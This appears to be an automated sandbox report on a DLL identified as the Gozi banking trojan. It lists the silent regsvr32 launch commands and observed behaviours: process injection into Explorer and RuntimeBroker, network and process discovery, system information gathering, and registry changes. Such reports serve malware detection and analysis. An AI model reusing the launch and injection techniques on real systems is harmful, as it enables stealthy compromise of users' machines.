Analysis Overview
SHA256
44026db9b82303793e896838dd9e85def8b501ec72e3b64584db38212ea312f5
Threat Level: Known bad
The file f9d778ad3bfea174401f36a2d88851d8 was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Suspicious behavior: MapViewOfSection
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Discovers systems in the same network
Suspicious use of WriteProcessMemory
Gathers system information
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-09 12:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-09 12:29
Reported
2022-08-09 12:31
Platform
win7-20220715-en
Max time kernel
48s
Max time network
45s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1932 wrote to memory of 1832 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\f9d778ad3bfea174401f36a2d88851d8.dll
Network
Files
memory/1932-54-0x000007FEFC381000-0x000007FEFC383000-memory.dmp
memory/1832-55-0x0000000000000000-mapping.dmp
memory/1832-56-0x0000000076281000-0x0000000076283000-memory.dmp
memory/1832-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1832-63-0x0000000000260000-0x000000000026D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-09 12:29
Reported
2022-08-09 12:31
Platform
win10v2004-20220722-en
Max time kernel
151s
Max time network
154s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1520 set thread context of 1028 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 1716 set thread context of 4028 | N/A | C:\Windows\SysWOW64\regsvr32.exe | C:\Windows\system32\control.exe |
| PID 1028 set thread context of 3520 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1028 set thread context of 3784 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1028 set thread context of 4816 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1028 set thread context of 3256 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 4028 set thread context of 4244 | N/A | C:\Windows\system32\control.exe | C:\Windows\system32\rundll32.exe |
| PID 1028 set thread context of 3240 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c405d5b7-d2cb-4889-97 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = ca73dba6fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = (value not captured in this extract) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\167bd767-e11a-4694-9b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = 12003ba5fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = b8354ba5fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\131eb43984b1980546e7a34a4bf0ee85963d930bdd55597864acd65e3aaf1002" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = 8c8355a7fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = (value not captured in this extract) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c54b2b9a-f76b-4132-94 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0065f893-8090-49d4-8d | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\9f50bf2a-2571-448d-91 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8d7e5b79-1c48-441e-81 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3dca5170-7664-448f-b7 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\4e798dfe657da92c6c7c8ffad553a0bf62ba6677d0190ebf3ae71aaa23078f57" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = (value not captured in this extract) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bd463626-4ad5-4ca8-a3 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0195558c-4a2c-49ac-ae = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ffece5954ed7a6bf283d28ce3cccf569e240c3907c13f708593aa3c6bc89ccab" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = 5c1352a5fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4c468db4-35fd-4660-b2 = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = bf2224a5fcabd801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c841ecb2-d60a-4f62-b9 = "\\\\?\\Volume{DF02D55C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9c89f2bd41aee2ec830a66132c5645606c291cf54f900f2c9b92cc3650442eca" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e1109ab4-d9b0-403e-b7 = (value not captured in this extract) | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d7eecab9-6c40-413e-95 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3fc1cacc-97cb-40cf-9f = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\903bd3c2-5569-474b-9c = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6e6822b2-ef40-42d8-b3 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a9cea0c2-7e1f-4d89-a5 | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
